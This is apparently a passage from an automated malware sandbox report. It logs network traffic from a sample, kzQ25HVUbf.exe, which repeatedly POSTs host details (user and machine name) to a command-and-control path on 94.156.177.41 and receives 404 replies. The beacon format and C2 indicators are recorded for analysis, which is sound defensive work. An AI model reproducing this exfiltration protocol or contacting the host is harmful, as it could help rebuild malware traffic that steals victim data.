                              Jan 11, 2025 08:39:04.924582958 CET805009794.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:04.924707890 CET5009780192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:04.924707890 CET5009780192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:04.929981947 CET805009794.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:05.099818945 CET5009880192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:05.104753971 CET805009894.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:05.104876041 CET5009880192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:05.107002020 CET5009880192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:05.111835957 CET805009894.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:05.111898899 CET5009880192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:05.116761923 CET805009894.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:05.834467888 CET805009894.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:05.834552050 CET805009894.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:05.834625959 CET5009880192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:05.837198019 CET5009880192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:05.842016935 CET805009894.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:05.989985943 CET5009980192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:05.994901896 CET805009994.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:05.995007992 CET5009980192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:05.997314930 CET5009980192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:06.002091885 CET805009994.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:06.002182007 CET5009980192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:06.006978989 CET805009994.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:06.824202061 CET805009994.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:06.824223042 CET805009994.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:06.824285030 CET5009980192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:06.824343920 CET5009980192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:06.829092979 CET805009994.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:06.967467070 CET5010080192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:06.972384930 CET805010094.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:06.972522974 CET5010080192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:06.974673033 CET5010080192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:06.979460001 CET805010094.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:06.979552031 CET5010080192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:06.984375000 CET805010094.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:07.710124016 CET805010094.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:07.710150957 CET805010094.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:07.710238934 CET5010080192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:07.710284948 CET5010080192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:07.715117931 CET805010094.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:07.887309074 CET5010180192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:07.892292023 CET805010194.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:07.892395020 CET5010180192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:07.894459009 CET5010180192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:07.899255991 CET805010194.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:07.899333000 CET5010180192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:07.904181004 CET805010194.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:08.598738909 CET805010194.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:08.598762035 CET805010194.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:08.598891020 CET5010180192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:08.598920107 CET5010180192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:08.603707075 CET805010194.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:08.802526951 CET5010280192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:08.807456017 CET805010294.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:08.807522058 CET5010280192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:08.809762001 CET5010280192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:08.814572096 CET805010294.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:08.814631939 CET5010280192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:08.819499016 CET805010294.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:09.507545948 CET805010294.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:09.507575035 CET805010294.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:09.507654905 CET5010280192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:09.507709026 CET5010280192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:09.512456894 CET805010294.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:09.668975115 CET5010380192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:09.674776077 CET805010394.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:09.674864054 CET5010380192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:09.677052021 CET5010380192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:09.682210922 CET805010394.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:09.685224056 CET5010380192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:09.691055059 CET805010394.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:10.394455910 CET805010394.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:10.394506931 CET805010394.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:10.394620895 CET5010380192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:10.394695997 CET5010380192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:10.399430037 CET805010394.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:10.546247959 CET5010480192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:10.551233053 CET805010494.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:10.551325083 CET5010480192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:10.553579092 CET5010480192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:10.558379889 CET805010494.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:10.558443069 CET5010480192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:10.563266039 CET805010494.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:11.312309980 CET805010494.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:11.312333107 CET805010494.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:11.312422991 CET5010480192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:11.312550068 CET5010480192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:11.317425966 CET805010494.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:11.450741053 CET5010580192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:11.455755949 CET805010594.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:11.455878019 CET5010580192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:11.458076954 CET5010580192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:11.462872982 CET805010594.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:11.462948084 CET5010580192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:11.467763901 CET805010594.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:12.212040901 CET805010594.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:12.212096930 CET805010594.156.177.41192.168.2.9
                              Jan 11, 2025 08:39:12.212304115 CET5010580192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:12.213185072 CET5010580192.168.2.994.156.177.41
                              Jan 11, 2025 08:39:12.218025923 CET805010594.156.177.41192.168.2.9
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jan 11, 2025 08:37:01.992582083 CET1.1.1.1192.168.2.90xf339No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                              Jan 11, 2025 08:37:01.992582083 CET1.1.1.1192.168.2.90xf339No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                              • 94.156.177.41
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.94980494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:17.278357029 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 172
                              Connection: close
                              Jan 11, 2025 08:37:17.283199072 CET172OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: 'ckav.rutina745481TINA-PCk0FDD42EE188E931437F4FBE2C1d1ET
                              Jan 11, 2025 08:37:17.995059967 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:17 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.94981194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:18.591609955 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 172
                              Connection: close
                              Jan 11, 2025 08:37:18.596493006 CET172OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: 'ckav.rutina745481TINA-PC+0FDD42EE188E931437F4FBE2CKPvSP
                              Jan 11, 2025 08:37:19.336060047 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:19 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.94981794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:19.425755978 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:19.430624962 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:20.138648987 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:20 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.94982894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:20.290095091 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:20.295162916 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:21.015218019 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:20 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.94983494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:21.328651905 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:21.333703041 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:22.060451984 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:21 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.94984194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:22.212016106 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:22.217011929 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:22.934484959 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:22 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.94984894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:23.097503901 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:23.102370977 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:23.790729046 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:23 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.94985494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:24.117260933 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:24.122123003 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:24.849899054 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:24 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.94986494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:25.022986889 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:25.027858019 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:25.749088049 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:25 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.94987094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:25.895386934 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:25.900547981 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:26.588424921 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:26 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.94987694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:26.761853933 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:26.766848087 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:27.478336096 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:27 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.94988294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:27.639379025 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:27.644318104 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:28.381721020 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:28 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.94988894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:28.546928883 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:28.555244923 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:29.254405975 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:29 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.94989594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:29.422964096 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:29.427876949 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:30.159415960 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:30 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.94990494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:30.316665888 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:30.321552992 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:31.068775892 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:30 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
